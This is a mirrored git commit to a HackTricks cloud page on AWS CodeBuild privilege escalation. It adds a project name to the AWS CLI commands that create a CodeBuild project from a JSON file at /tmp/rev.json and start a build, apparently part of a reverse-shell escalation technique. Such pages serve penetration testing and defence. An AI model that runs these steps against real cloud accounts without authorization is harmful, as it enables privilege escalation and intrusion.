mirror of
https://github.com/HackTricks-wiki/hacktricks-cloud.git
synced 2026-02-04 11:07:37 -08:00
Update aws-codebuild-privesc.md
This commit is contained in:
@@ -118,7 +118,7 @@ REV_PATH="/tmp/rev.json"
|
||||
printf "$JSON" > $REV_PATH
|
||||
|
||||
# Create project
|
||||
aws codebuild create-project --cli-input-json file://$REV_PATH
|
||||
aws codebuild create-project --name codebuild-demo-project --cli-input-json file://$REV_PATH
|
||||
|
||||
# Build it
|
||||
aws codebuild start-build --project-name codebuild-demo-project
|
||||
|
||||
Reference in New Issue
Block a user